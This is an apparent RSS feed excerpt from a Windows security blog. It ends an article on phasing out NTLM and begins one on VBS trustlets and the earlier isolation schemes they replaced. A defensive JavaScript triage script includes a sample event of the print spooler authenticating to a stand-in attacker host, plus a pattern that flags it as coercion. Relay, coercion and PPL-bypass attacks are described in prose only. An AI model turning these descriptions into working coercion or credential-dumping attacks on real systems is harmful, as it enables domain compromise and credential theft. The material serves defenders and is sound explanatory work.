// &quot;Applications and Services Logs &amp;gt; Microsoft &amp;gt; Windows &amp;gt; NTLM &amp;gt; Operational&quot;
// after enabling the KB 5064479 enhanced auditing GPOs. The point of running
// this in JavaScript is to make the rules explicit so you can think through
// edge cases without standing up a Windows event channel.&lt;/p&gt;
&lt;p&gt;const sampleEvents = [
  { process: &quot;C:\\app\\legacy.exe&quot;,      reason: &quot;NoSPN&quot;,          target: &quot;ldap/dc01.example.local&quot;, count: 142 },
  { process: &quot;C:\\Program Files\\Backup\\agent.exe&quot;, reason: &quot;ExplicitNtlm&quot;,   target: &quot;cifs/backup02.example.local&quot;, count: 9 },
  { process: &quot;C:\\Windows\\System32\\spoolsv.exe&quot;,   reason: &quot;NoDcReach&quot;,      target: &quot;cifs/attacker.example.local&quot;, count: 1 },
  { process: &quot;C:\\Windows\\System32\\lsass.exe&quot;,     reason: &quot;LocalAccount&quot;,   target: &quot;host\\WORKGROUP-PC01&quot;,   count: 38 },
  { process: &quot;C:\\Windows\\System32\\svchost.exe&quot;,   reason: &quot;NoSPN&quot;,          target: &quot;host/aliased.example.local&quot;, count: 7 },
];&lt;/p&gt;
&lt;p&gt;function triage(events) {
  const out = [];
  for (const e of events) {
    let severity = &quot;info&quot;;
    let actions = [];
    if (e.reason === &quot;ExplicitNtlm&quot;) {
      severity = &quot;high&quot;;
      actions.push(&quot;Fix caller: replace AcquireCredentialsHandle(&apos;Ntlm&apos;) with &apos;Negotiate&apos;&quot;);
    }
    if (e.reason === &quot;NoSPN&quot;) {
      severity = &quot;medium&quot;;
      actions.push(&quot;Register an SPN for the target or enable IP-SPN policy&quot;);
    }
    if (e.reason === &quot;LocalAccount&quot;) {
      severity = &quot;medium&quot;;
      actions.push(&quot;Plan Local KDC enrollment in Phase 2 pilot&quot;);
    }
    if (/spoolsv\.exe$/i.test(e.process) &amp;amp;&amp;amp; /attacker/i.test(e.target)) {
      severity = &quot;critical&quot;;
      actions.push(&quot;Suspicious: Spooler authenticating to non-domain UNC. Likely coercion attempt -- isolate, then disable Spooler on this host&quot;);
    }
    out.push({ process: e.process, severity, actions });
  }
  return out;
}&lt;/p&gt;
&lt;p&gt;for (const row of triage(sampleEvents)) {
  console.log(`[${row.severity.toUpperCase()}] ${row.process}`);
  for (const a of row.actions) console.log(&quot;    -&amp;gt; &quot; + a);
}
`}&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; - &lt;strong&gt;&lt;code&gt;LMCompatibilityLevel = 5&lt;/code&gt; without audit.&lt;/strong&gt; Forcing NTLMv2-only on every DC is correct as an endpoint, but flipping it without first running KB 5064479 audit will outage legacy applications that still attempt NTLMv1 [@ms-kb5064479]. - &lt;strong&gt;&lt;code&gt;RestrictNTLM:Deny&lt;/code&gt; without exceptions.&lt;/strong&gt; The Restrict NTLM family of GPOs supports per-server exemptions. Going straight to &lt;code&gt;Deny&lt;/code&gt; without an exemption list is the classic outage path. - &lt;strong&gt;EPA on HTTPS-only while leaving plain HTTP enabled.&lt;/strong&gt; KB 5005413 explicitly requires &lt;em&gt;both&lt;/em&gt; &lt;code&gt;policyEnforcement=&quot;Always&quot;&lt;/code&gt; and disabling plain HTTP on &lt;code&gt;/certsrv/&lt;/code&gt;. Leaving HTTP up makes the EPA enforcement moot [@ms-kb5005413]. - &lt;strong&gt;Trusting Credential Guard against coercion.&lt;/strong&gt; Credential Guard protects against credential &lt;em&gt;theft&lt;/em&gt;. It does not protect against ESC8, PetitPotam, or any other relay-of-live-authentication chain [@ms-credential-guard].&lt;/p&gt;
&lt;/blockquote&gt;

On a non-production Windows 11 Insider machine, the per-machine NTLM scope policy lives under `HKLM\SYSTEM\CurrentControlSet\Control\Lsa\MSV1_0`. Microsoft&apos;s pre-release documentation will name the value used to gate the Phase 2 IAKerb / Local KDC behaviours; consult the Windows Insider release notes that ship with the Phase 2 flight rather than hard-coding a value here -- the keys are subject to change up to GA. Use the `ntlm@microsoft.com` outreach channel for any environment-specific question [@gewida-2026-disabling].
&lt;p&gt;This is the work. The Phase 3 deadline is the next major Windows release; the Phase 1 audit window is right now. If you wait, the cut-over surfaces breakage as outage. If you audit, the cut-over is uneventful.&lt;/p&gt;
&lt;h2&gt;11. Frequently Asked Questions&lt;/h2&gt;

No. NTLMv2 is the version Drop-the-MIC, PetitPotam, and ESC8 all attack [@nvd-cve-2019-1040, @specterops-cert-preowned-blog]. The HMAC-MD5 response is strong against the response side, but the password-equivalence of the NT-hash and the lack of binding to the underlying transport are the structural properties every modern attack exploits. NTLMv2 is the *least bad* NTLM, not a safe NTLM.

Phase 1 controls let you *audit*. Phase 2 features (IAKerb, Local KDC, IP-SPN, the Negotiate refactor) are what make disabling *survivable* for most organisations. If you go straight to `RestrictNTLM:Deny` without running the KB 5064479 audit first, you will outage legacy applications and possibly your help-desk laptops. The honest answer is: audit now, pilot Phase 2 in H2 2026, default-off at Phase 3 [@gewida-2026-disabling, @ms-kb5064479].

No. Credential Guard fixes credential *theft* from LSASS. It does nothing about credential *use* (relay), coercion (PetitPotam), or cross-protocol chains (ESC8). It is necessary -- ESC8 + Mimikatz is worse than ESC8 alone -- but it is not sufficient against the relay class [@ms-credential-guard].

No. KrbRelay and KrbRelayUp demonstrate the relay *class* survives on Kerberos. What changes is the named primitives, not the existence of relay. Defence is the same shape after Phase 3 as before: LDAP signing and channel binding everywhere, EPA enforced on every authentication endpoint, message integrity required at every level [@gh-krbrelayup].

Because the four fallback reasons (no DC, local accounts, no SPN, hard-coded NTLM) had no engineered answer until IAKerb, Local KDC, NEGOEX, and the Negotiate refactor existed in shippable form. The standards work, the IETF drafts (one of which was marked Dead WG Document in 2019 and is being revived), the MIT 1.9 parity, and the Apple precedent all had to exist before Microsoft had a credible removal path that did not break enterprise deployments [@palko-2023-evolution, @draft-ietf-kitten-iakerb].

Yes. MIT Kerberos has had IAKerb since 1.9 (released February 2011). Apple ships `GSS_IAKERB_MECHANISM` since macOS 10.14 (Mojave, 2018). The Samba `localkdc` effort from Bokovoy and Schneider (FOSDEM 2025) is the parallel open-source path for a Linux local KDC. Heterogeneous Windows-domain estates with Linux file servers and macOS clients are positioned to interoperate with Phase 3 *better* than they did with NTLMv2 [@cryptomilk-localkdc].
&lt;p&gt;NTLM was the answer to a 1987 problem and a 1993 problem. It survived because removing it required engineering four orthogonal capabilities that did not exist. They exist now. The next major Windows release ships without it on by default. The attacks that follow it -- KrbRelayUp, RBCD chains, S4U2Self abuse, certificate-template misconfiguration -- target a different protocol with a different vocabulary. The relay &lt;em&gt;class&lt;/em&gt; persists. The protocol it targets is no longer NTLM.&lt;/p&gt;
&lt;p&gt;If you read this article as part of a sequence, the prior pieces cover the &lt;a href=&quot;https://paragmali.com/blog/windows-access-control-25-years-of-attacks/&quot; rel=&quot;noopener&quot;&gt;access-control model&lt;/a&gt; (&lt;code&gt;SeAccessCheck&lt;/code&gt; and its inputs), the chip-layer credential story (TPM, &lt;a href=&quot;https://paragmali.com/blog/pluton-a-tpm-on-silicon-microsoft-can-patch/&quot; rel=&quot;noopener&quot;&gt;Pluton&lt;/a&gt;, Credential Guard, BitLocker), and the &lt;a href=&quot;https://paragmali.com/blog/windows-app-identity-33-year-reinvention/&quot; rel=&quot;noopener&quot;&gt;application-identity layer&lt;/a&gt; (Authenticode, signed binaries, AppLocker, smart application control). NTLM removal is one strand of the broader move from &quot;trust the perimeter&quot; to &quot;tie every credential to a token, a chip, or a Kerberos ticket whose lifetime you can name.&quot; Each strand by itself is incomplete; together they are how the next decade of Windows authentication looks.&lt;/p&gt;
&lt;p&gt;&amp;lt;StudyGuide slug=&quot;ntlmless-the-death-of-ntlm-in-windows&quot; keyTerms={[
  { term: &quot;LM hash&quot;, definition: &quot;1987 LAN Manager hash. Uppercase the password, pad/truncate to 14 characters, split into two 7-byte halves, DES-encrypt KGS!@#$% with each half. Password-equivalent, case-insensitive, no salt.&quot; },
  { term: &quot;NT-hash&quot;, definition: &quot;MD4(UTF-16LE(password)). Sixteen bytes. The long-term secret every NTLM response derives from. Possession equals authority.&quot; },
  { term: &quot;NTLMv2&quot;, definition: &quot;HMAC-MD5 response over server_challenge || client_challenge || timestamp || av_pairs, keyed by NTOWFv2 = HMAC_MD5(NT-hash, UNICODE(Upper(user)||domain)). Ships in NT 4.0 SP4, October 1998.&quot; },
  { term: &quot;SPNEGO / Negotiate&quot;, definition: &quot;The GSS-API negotiation mechanism Windows uses to pick between Kerberos and NTLM. The Windows SSPI provider is called Negotiate.&quot; },
  { term: &quot;MIC&quot;, definition: &quot;Message Integrity Code -- HMAC-MD5 keyed by ExportedSessionKey over the concatenation of all three NTLM messages. Defeated by Drop-the-MIC (CVE-2019-1040).&quot; },
  { term: &quot;EPA / CBT&quot;, definition: &quot;Extended Protection for Authentication / Channel Binding Token. A hash of the TLS endpoint certificate placed in the MsvAvChannelBindings AV_PAIR.&quot; },
  { term: &quot;Pass-the-Hash&quot;, definition: &quot;Using a stolen NT-hash directly as the credential, without ever knowing the cleartext password. First published by Paul Ashton in 1997.&quot; },
  { term: &quot;NTLM relay&quot;, definition: &quot;Forwarding a live NTLM exchange between a victim client and a third-party target. First public PoC: Sir Dystic&apos;s SMBRelay (March 31, 2001).&quot; },
  { term: &quot;Coercion&quot;, definition: &quot;Causing a Windows service running as SYSTEM to NTLM-authenticate to an attacker-controlled destination via an RPC method that takes a UNC path. SpoolSample (2018), PetitPotam (2021), Coercer (2022).&quot; },
  { term: &quot;ESC8&quot;, definition: &quot;Coerced NTLM relayed to AD CS Web Enrollment (/certsrv/), yielding a certificate that yields a TGT via PKINIT. Schroeder + Christensen, Certified Pre-Owned, June 17, 2021.&quot; },
  { term: &quot;IAKerb&quot;, definition: &quot;Initial and Pass Through Authentication Using Kerberos V5 and the GSS-API. Lets a client with no KDC reach proxy AS-REQ / TGS-REQ through an application server.&quot; },
  { term: &quot;Local KDC&quot;, definition: &quot;A small Kerberos KDC against the local SAM, exposed via IAKerb. Shipping in Windows 11 / Server 2025.&quot; },
  { term: &quot;NEGOEX&quot;, definition: &quot;SPNEGO Extended Negotiation. Adds a meta-data exchange inside the SPNEGO envelope so IAKerb can be negotiated under Negotiate. NOT RFC 8143 (which is NNTP+TLS); the correct primaries are [MS-NEGOEX] and draft-zhu-negoex.&quot; }
]} /&amp;gt;&lt;/p&gt;
</content:encoded><category>windows-security</category><category>ntlm</category><category>kerberos</category><category>active-directory</category><category>pass-the-hash</category><category>ntlm-relay</category><category>petitpotam</category><category>esc8</category><author>noreply@paragmali.com (Parag Mali)</author></item><item><title>VBS Trustlets: What Actually Runs in the Secure Kernel</title><link>https://paragmali.com/blog/vbs-trustlets-what-actually-runs-in-the-secure-kernel/</link><guid isPermaLink="true">https://paragmali.com/blog/vbs-trustlets-what-actually-runs-in-the-secure-kernel/</guid><description>A field guide to Virtualization-Based Security trustlets on Windows 11: the five gates a binary passes to become one, the inbox roster, and where the model ends.</description><pubDate>Sun, 10 May 2026 00:00:00 GMT</pubDate><content:encoded>
**Trustlets are the user-mode processes Microsoft places in Virtual Trust Level 1** to hold the secrets a SYSTEM-privilege attacker on the Windows kernel must never reach: NTLM hashes, Kerberos tickets, biometric templates, virtual TPM keys, and (in 2025-2026) just-in-time admin tokens. A binary becomes a trustlet by passing five gates at load time: a process attribute, two specific signing EKUs at Signature Level 12, a `.tpolicy` PE section containing `s_IumPolicyMetadata`, a Trustlet Instance GUID, and a stripped-down loader path. Once loaded, the trustlet talks to the rest of Windows over ALPC, services an agent process in VTL0, and uses only 48 of NT&apos;s roughly 480 syscalls. The Hyper-V hypervisor refuses to map its pages into VTL0. That is what &quot;isolated&quot; means.
&lt;h2&gt;1. Four Locked Rooms&lt;/h2&gt;
&lt;p&gt;It is 3:14 a.m. and a red-team operator on a fully patched Windows 11 25H2 box has, after eight hours of careful work, achieved the prize: a SYSTEM-privilege write primitive in the NT kernel. For two decades that has been the moment when the engagement ends and the report writes itself. SYSTEM in the kernel meant every process, every page, every secret. Game over.&lt;/p&gt;
&lt;p&gt;It is not game over.&lt;/p&gt;
&lt;p&gt;The operator&apos;s target list has four items on it. The &lt;a href=&quot;https://paragmali.com/blog/ntlmless-the-death-of-ntlm-in-windows&quot; rel=&quot;noopener&quot;&gt;NTLM hashes&lt;/a&gt; and Kerberos Ticket-Granting Tickets sitting in &lt;code&gt;lsass.exe&lt;/code&gt;. The user&apos;s fingerprint template, in whatever process the &lt;a href=&quot;https://paragmali.com/blog/your-face-is-not-your-password-inside-windows-hellos-hardwar&quot; rel=&quot;noopener&quot;&gt;Windows Hello&lt;/a&gt; biometric pipeline puts it. The just-in-time admin token that Administrator Protection issued thirty seconds ago. The keys of the four Hyper-V virtual machines running on the box, including the one hosting the user&apos;s corporate VPN. Four secrets. Four user-mode processes. And on this 2026 machine, four locked rooms whose pages the operator&apos;s kernel write primitive cannot touch and whose contents the operator&apos;s kernel does not have permission to ask.&lt;/p&gt;
&lt;p&gt;Those four processes are &lt;em&gt;trustlets&lt;/em&gt;. They run in a different kernel from the one the operator just compromised, on a different virtual trust level enforced by a hypervisor running underneath both. The operator owns the NT kernel; the NT kernel does not own them. That sentence is what changed in 2015, and the rest of this piece is what it actually means.&lt;/p&gt;
&lt;p&gt;This is not &quot;Microsoft hid the memory better.&quot; It is not obfuscation, not a clever access-control rule, not a kernel mitigation that the next CVE will erase. It is an architectural relocation: the user-mode processes that hold the secrets no longer live in the operating system the attacker compromised. The hypervisor refuses to map their pages into Virtual Trust Level 0 (&quot;VTL0&quot;), and the operator&apos;s kernel is in VTL0.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; Four user-mode processes survive a SYSTEM kernel write primitive on a 2026 Windows 11 box. That is what changed in 2015, and trustlets are the reason.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The promise of this piece is to explain trustlets at the level of &quot;what does &lt;code&gt;LsaIso.exe&lt;/code&gt; actually do, how is it built, how does it talk to the rest of the system, and where does the model end.&quot; Not at the level of &quot;VBS isolates them.&quot; By the end, four locked rooms will have become something you can name, list, audit, and reason about. Where the public record runs out (some trustlet binary names and IDs are not on Microsoft&apos;s published list as of mid-2026), the piece will say so, and it will tell you what the actual records look like instead of inventing replacements.&lt;/p&gt;
&lt;p&gt;So how does a user-mode process become unreachable from SYSTEM-in-the-NT-kernel? The answer is not new. It begins, like much of operating-system security, at MIT in the early 1970s.&lt;/p&gt;
&lt;h2&gt;2. The User-Mode-In-A-Higher-Privilege Problem&lt;/h2&gt;
&lt;p&gt;In March 1972 Michael Schroeder and Jerome Saltzer published a paper in the &lt;em&gt;Communications of the ACM&lt;/em&gt; describing an unusual machine. The Multics team at MIT had been wrestling with a question that does not, at first glance, sound like a security question. What should happen when a user program calls a password-checking routine that needs to read the system password file? The user program must not be allowed to read that file directly. The routine must be allowed to read it. The two pieces of code run in the same process. How does the machine know which one is asking?&lt;/p&gt;
&lt;p&gt;Schroeder and Saltzer&apos;s answer was eight hardware-enforced rings of privilege, with each segment in memory carrying a &lt;em&gt;ring bracket&lt;/em&gt; in its descriptor word, and with cross-ring calls validated automatically by the hardware [@multicians-protection] [@multicians-papers]. The hardware that shipped this design was the Honeywell 6180 in 1973 [@wiki-protection-ring]. The pattern matters more than the gear. Some user code needed to run with more privilege than its caller and less privilege than the kernel. Multics arranged eight such layers from user code at the outermost ring down to the supervisor at ring 0 [@wiki-multics].&lt;/p&gt;

The set of hardware, firmware, and software whose correct operation is necessary to enforce a security policy. If any component of the TCB can be subverted, the policy can be subverted. The smaller the TCB, the easier it is to audit; the larger it is, the more places an attacker can find a foothold.
&lt;p&gt;A few years later at Carnegie Mellon, William Wulf, Roy Levin, and the Hydra team took a different swing at the same problem. Hydra was a capability-based, object-oriented microkernel that ran on the C.mmp multiprocessor between 1971 and 1975 [@wiki-hydra]. Where Multics multiplied rings, Hydra multiplied &lt;em&gt;vocabulary&lt;/em&gt;: every protected resource was an object addressable only through capability tokens, and security-critical subsystems lived not inside the kernel but as user-mode capability-holders trusted by the kernel to enforce their own policy. Levin et al.&apos;s 1975 SOSP paper &quot;Policy/Mechanism Separation in HYDRA&quot; gave the design its slogan, and that slogan has outlived the system that produced it [@levy-capabook].Hydra&apos;s &quot;policy versus mechanism&quot; phrasing still appears verbatim in modern object-capability literature, in the design discussion of WebAssembly&apos;s component model, and in seL4&apos;s published rationale.&lt;/p&gt;
&lt;p&gt;For two decades the L4 family answered &quot;but is this fast enough to be practical?&quot; Jochen Liedtke&apos;s 1993 prototype, hand-coded in i386 assembly, ran inter-process communication twenty times faster than Carnegie&apos;s Mach microkernel [@wiki-l4]. His 1995 SOSP paper &quot;On µ-Kernel Construction&quot; was inducted into the ACM SIGOPS Hall of Fame in 2015 and is the foundational statement of the minimal-kernel, maximal-user-mode-trusted-services design. By 2010, OKL4, a commercial L4 derivative, had shipped in over one billion mobile devices [@wiki-l4].&lt;/p&gt;

A kernel design that pushes as much functionality as possible out of kernel mode and into user-mode &quot;servers&quot; that communicate via inter-process calls. Filesystem code, networking stacks, even device drivers can run as user-mode processes. The kernel itself shrinks to a few thousand lines of code that schedule processes, route messages, and enforce memory isolation, and nothing else.
&lt;p&gt;In 2009 the lineage reached an end that nobody had reached before. Gerwin Klein, Kevin Elphinstone, Gernot Heiser and the NICTA team published &lt;em&gt;seL4: Formal Verification of an OS Kernel&lt;/em&gt; at SOSP, reporting a machine-checked proof of functional correctness from a formal specification down to the C implementation [@sel4-sosp-paper]. seL4 was open-sourced in July 2014 [@wiki-sel4]; the seL4 Foundation&apos;s About page states plainly that seL4 stands out because of its thoroughgoing formal verification [@sel4-about]. A kernel of about 8,700 lines of C, formally verified from specification to C implementation, with sub-microsecond inter-process calls.&lt;/p&gt;
&lt;p&gt;Schroeder and Saltzer asked it for hardware rings. Hydra asked it for capabilities. Liedtke asked it for inter-process speed. Klein and Heiser asked it of formal logic. The question stayed the same: how do you let some user-mode code hold a secret that some other code in the same machine is not allowed to read, when both pieces of code are scheduled by the same kernel? The Multics answer was rings. The Hydra answer was capabilities. The L4 answer was a tiny kernel plus IPC. The seL4 answer was a tiny kernel plus IPC, plus a proof.&lt;/p&gt;
&lt;p&gt;The Microsoft answer, in July 2015, was a hypervisor.&lt;/p&gt;

timeline
    title User-mode-in-higher-privilege lineage
    1972 : Multics 8-ring hardware
         : Honeywell 6180 ring brackets
    1974 : Hydra capabilities
    1975 : Policy vs mechanism
    1993 : L4 microkernel
         : Fast user-mode IPC
         : Windows NT ships ring 0/3
    2007 : Vista Protected Processes
    2009 : seL4 verification
    2013 : Windows 8.1 PPL
    2015 : Windows 10 IUM ships
         : Trustlets 0-3 enumerated
    2024 : VBS Enclaves go third-party
    2026 : Administrator Protection
&lt;p&gt;If the architectural answer was already in the 1970s academic literature, why did Microsoft wait until 2015 to ship it on Windows? Because three earlier attempts to ship user-mode isolation on Windows -- under three different names, in three different decades -- each failed in the same way.&lt;/p&gt;
&lt;h2&gt;3. Three Tries Before Trustlets&lt;/h2&gt;
&lt;p&gt;Before 2015 Microsoft tried three times to ship user-mode isolation on Windows. All three shipped in production. All three failed in the same way.&lt;/p&gt;
&lt;h3&gt;2007: Vista Protected Processes&lt;/h3&gt;
&lt;p&gt;Windows Vista introduced &lt;em&gt;Protected Processes&lt;/em&gt; in January 2007. The motivation was not credential security; it was Digital Rights Management. The Protected Media Path required a set of binaries -- &lt;code&gt;audiodg.exe&lt;/code&gt;, &lt;code&gt;mfpmp.exe&lt;/code&gt;, and a handful of others involved in Blu-ray playback -- whose memory non-protected processes could not read, whose threads could not be debugged from outside, and whose DLL imports could not be hijacked at runtime [@wiki-pmp]. The kernel enforced these rules by refusing to grant the relevant access masks (&lt;code&gt;PROCESS_VM_READ&lt;/code&gt;, &lt;code&gt;PROCESS_VM_WRITE&lt;/code&gt;, &lt;code&gt;THREAD_ALL_ACCESS&lt;/code&gt;) to handles requested from non-protected processes.&lt;/p&gt;
&lt;p&gt;The mechanism was elegant. The threat model was not. Alex Ionescu announced in January 2007 -- within weeks of Vista&apos;s general availability -- that he had developed a bypass method for the Protected Media Path [@wiki-pmp]. The same NT kernel that enforced the protection was the kernel an attacker would compromise to bypass it. A signed kernel driver, or any of the long stream of subsequent kernel vulnerabilities, would walk straight through.&lt;/p&gt;
&lt;h3&gt;2012: AppContainer and the LowBox token&lt;/h3&gt;
&lt;p&gt;Windows 8 introduced &lt;a href=&quot;https://paragmali.com/blog/windows-app-identity-33-year-reinvention&quot; rel=&quot;noopener&quot;&gt;AppContainer&lt;/a&gt; process isolation in October 2012, originally to support Windows Store apps (later unified as the Universal Windows Platform in Windows 10) [@wiki-uwp]. Each AppContainer process ran with a &lt;em&gt;LowBox&lt;/em&gt; token: a low-integrity primary token plus a SID, plus a set of named capabilities (&lt;code&gt;internetClient&lt;/code&gt;, &lt;code&gt;picturesLibrary&lt;/code&gt;, and so on), plus a per-AppContainer named-object subtree under &lt;code&gt;\Sessions\&amp;lt;N&amp;gt;\AppContainerNamedObjects\&amp;lt;SID&amp;gt;&lt;/code&gt;. The NT kernel checked the SID against object DACLs at every object access, denying access by default and granting it only where the AppContainer&apos;s declared capabilities matched the requested operation.&lt;/p&gt;
&lt;p&gt;This is a Hydra-style capability lattice bolted onto NT&apos;s existing access-control system. It is a useful sandboxing primitive for &lt;em&gt;untrusted&lt;/em&gt; code, and modern browsers (the Edge renderer, the Chromium sandbox) consume it for exactly that purpose. It is not a defence against an attacker who already has kernel code execution. In August 2018 James Forshaw at Google Project Zero published an exploit for Issue 1550 that turned the AppContainer named-object namespace itself into an arbitrary-directory-creation primitive [@forshaw-2018]:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;The AppInfo service... calls the undocumented API CreateAppContainerToken... As the API is called without impersonating the user... the object directories are created with the identity of the service, which is SYSTEM.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;A low-integrity caller could direct that SYSTEM-owned creation at any directory it pleased and use the result to elevate. The lattice held; the lattice&apos;s &lt;em&gt;enforcer&lt;/em&gt; did not. AppContainers continue to ship, doing their actual job (sandboxing untrusted code) reasonably well. They were never going to answer the trustlet question (isolating trusted code from a compromised kernel) because they are NT-kernel-enforced.&lt;/p&gt;
&lt;h3&gt;2013: Protected Process Light (PPL) and &lt;code&gt;RunAsPPL&lt;/code&gt;&lt;/h3&gt;
&lt;p&gt;Windows 8.1 generalised the Vista mechanism into a &lt;em&gt;signer-level lattice&lt;/em&gt;. Each protected process now had a two-dimensional protection level: a signer (&lt;code&gt;PsProtectedSignerWinTcb&lt;/code&gt;, &lt;code&gt;PsProtectedSignerWindows&lt;/code&gt;, &lt;code&gt;PsProtectedSignerAntimalware&lt;/code&gt;, &lt;code&gt;PsProtectedSignerAuthenticode&lt;/code&gt;, others) and a protection type (&lt;code&gt;PsProtectedTypeProtectedLight&lt;/code&gt; or &lt;code&gt;PsProtectedTypeProtected&lt;/code&gt;). Higher-signer processes could manipulate lower-signer ones; same-signer processes could not see across the line. The first canonical use case was anti-malware services that registered an Early Launch Anti-Malware (ELAM) driver and then ran their user-mode service as a Protected Process Light [@msdocs-protecting-am].&lt;/p&gt;

A Windows 8.1 process attribute that constrains which other processes can request high-privilege access to it. PPL extends the Vista Protected Process mechanism with a signer-level lattice (WinTcb &amp;gt; Windows &amp;gt; Antimalware &amp;gt; Authenticode &amp;gt; None) and a protection type. The NT kernel enforces the rules. LSASS running as a PPL is the canonical use case, exposed to administrators via the `RunAsPPL` registry value [@itm4n-runasppl].
&lt;p&gt;Alex Ionescu&apos;s 2013 essay &quot;The Evolution of Protected Processes Part 3&quot; documented the resulting Signing Levels table -- Signature Level 12 named &quot;Windows,&quot; Level 13 &quot;Windows Protected Process Light,&quot; Level 14 &quot;Windows TCB&quot; [@ionescu-ppp3] [@ionescu-ppp1]. That table is the load-bearing reference for every later trustlet design: every IUM binary on a 2026 Windows machine must satisfy &lt;em&gt;at least&lt;/em&gt; Signature Level 12. Microsoft shipped LSASS-as-PPL (&quot;LSA Protection,&quot; exposed through the &lt;code&gt;RunAsPPL&lt;/code&gt; registry value under &lt;code&gt;HKLM\SYSTEM\CurrentControlSet\Control\Lsa&lt;/code&gt;) as the canonical example: a way to keep the lower-privileged half of an administrator&apos;s session from reading credential material out of LSASS memory.&lt;/p&gt;
&lt;p&gt;It worked, for some values of &quot;worked.&quot; It worked against pass-the-hash tools that ran as an ordinary administrator without a signed kernel driver. It did not work against an attacker willing to load any signed driver, and -- as became clear in 2021 -- it did not work even from userland once the bypass class was identified.&lt;/p&gt;
&lt;p&gt;In August 2018 James Forshaw, in the same Project Zero post that exposed the AppContainer issue, also documented a &lt;code&gt;DefineDosDevice&lt;/code&gt; plus Known-DLL hijack technique. By creating a symbolic link in the NT object manager namespace that aliased a Known DLL section, an administrative caller could induce a target PPL process to load arbitrary code at the next image load [@forshaw-2018]. In 2021 the researcher who blogs as itm4n weaponised the same primitive into &lt;code&gt;PPLdump&lt;/code&gt;, a userland tool that dumped &lt;code&gt;lsass.exe&lt;/code&gt; memory from an administrator command prompt with no kernel driver involved [@itm4n-runasppl]. itm4n&apos;s writeup is honest about what this means:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Like any other protection though, it is not bulletproof and it is not sufficient on its own, but it is still particularly efficient.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Microsoft closed the &lt;code&gt;DefineDosDevice&lt;/code&gt; corner of this class in Windows 10 21H2 build 19044.1826, shipped in July 2022 [@itm4n-end-of-ppldump]. That is eight years of mainstream PPL deployment during which the LSASS-as-PPL credential boundary was bypassable without ring 0 access at all.&lt;/p&gt;
&lt;h3&gt;The pattern&lt;/h3&gt;
&lt;p&gt;Three primitives. Three different protection mechanisms. One common failure mode.&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Mechanism&lt;/th&gt;
&lt;th&gt;Year&lt;/th&gt;
&lt;th&gt;Enforcer&lt;/th&gt;
&lt;th&gt;Threat model&lt;/th&gt;
&lt;th&gt;Defeated by&lt;/th&gt;
&lt;th&gt;Status today&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;Vista Protected Process&lt;/td&gt;
&lt;td&gt;2007&lt;/td&gt;
&lt;td&gt;NT kernel&lt;/td&gt;
&lt;td&gt;Untrusted user code reading DRM-protected media buffers&lt;/td&gt;
&lt;td&gt;Signed kernel drivers; Ionescu Jan 2007 [@wiki-pmp]&lt;/td&gt;
&lt;td&gt;Superseded by PPL for non-DRM use&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;AppContainer / LowBox&lt;/td&gt;
&lt;td&gt;2012&lt;/td&gt;
&lt;td&gt;NT kernel&lt;/td&gt;
&lt;td&gt;Untrusted store-app code escaping its capability sandbox&lt;/td&gt;
&lt;td&gt;SYSTEM-owned directory creation via service impersonation [@forshaw-2018]&lt;/td&gt;
&lt;td&gt;Active for sandboxing untrusted code; not a trustlet substitute&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Protected Process Light (&lt;code&gt;RunAsPPL&lt;/code&gt;)&lt;/td&gt;
&lt;td&gt;2013&lt;/td&gt;
&lt;td&gt;NT kernel&lt;/td&gt;
&lt;td&gt;Userland administrative attacker reading LSASS credential material&lt;/td&gt;
&lt;td&gt;&lt;code&gt;DefineDosDevice&lt;/code&gt; plus Known-DLL hijack; PPLdump 2021 [@itm4n-runasppl]&lt;/td&gt;
&lt;td&gt;Active as defence-in-depth; closed in build 19044.1826, July 2022&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Isolated User Mode / trustlets&lt;/td&gt;
&lt;td&gt;2015&lt;/td&gt;
&lt;td&gt;Hypervisor + Secure Kernel&lt;/td&gt;
&lt;td&gt;VTL0 kernel attacker reading user-mode secrets&lt;/td&gt;
&lt;td&gt;Secure-call interface bugs; agent-side RPC residual [@amar-bh2020]&lt;/td&gt;
&lt;td&gt;Active; subject of this article&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;p&gt;Three rows, one diagnosis. Every NT-kernel-enforced isolation primitive shares the attacker&apos;s TCB. Improving the lattice the NT kernel enforces does not move the security ceiling, because the NT kernel itself can be compromised; once it is, any policy decision the NT kernel makes is the attacker&apos;s policy decision. Microsoft&apos;s own VBS hardware-requirements page admits the diagnosis verbatim:&lt;/p&gt;

VBS uses hardware virtualization and the Windows hypervisor to create an isolated virtual environment that becomes the root of trust of the OS that assumes the kernel can be compromised. -- Microsoft, OEM VBS hardware requirements [@msdocs-oem-vbs]
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; &lt;code&gt;RunAsPPL&lt;/code&gt; is useful defence in depth. It is not, and has never been, a substitute for Credential Guard. itm4n&apos;s 2021 PPLdump release was the proof for the userland half of that statement; signed-driver loaders are the proof for the ring-zero half. If your threat model includes a determined attacker with administrative rights, Credential Guard is the boundary; PPL is the speed bump in front of it [@itm4n-runasppl].&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;If every primitive the NT kernel enforces shares the attacker&apos;s TCB, the kernel that enforces user-mode isolation has to be a &lt;em&gt;different&lt;/em&gt; kernel. In July 2015 Microsoft shipped one.&lt;/p&gt;
&lt;h2&gt;4. July 2015: The Hypervisor Becomes the Arbiter&lt;/h2&gt;
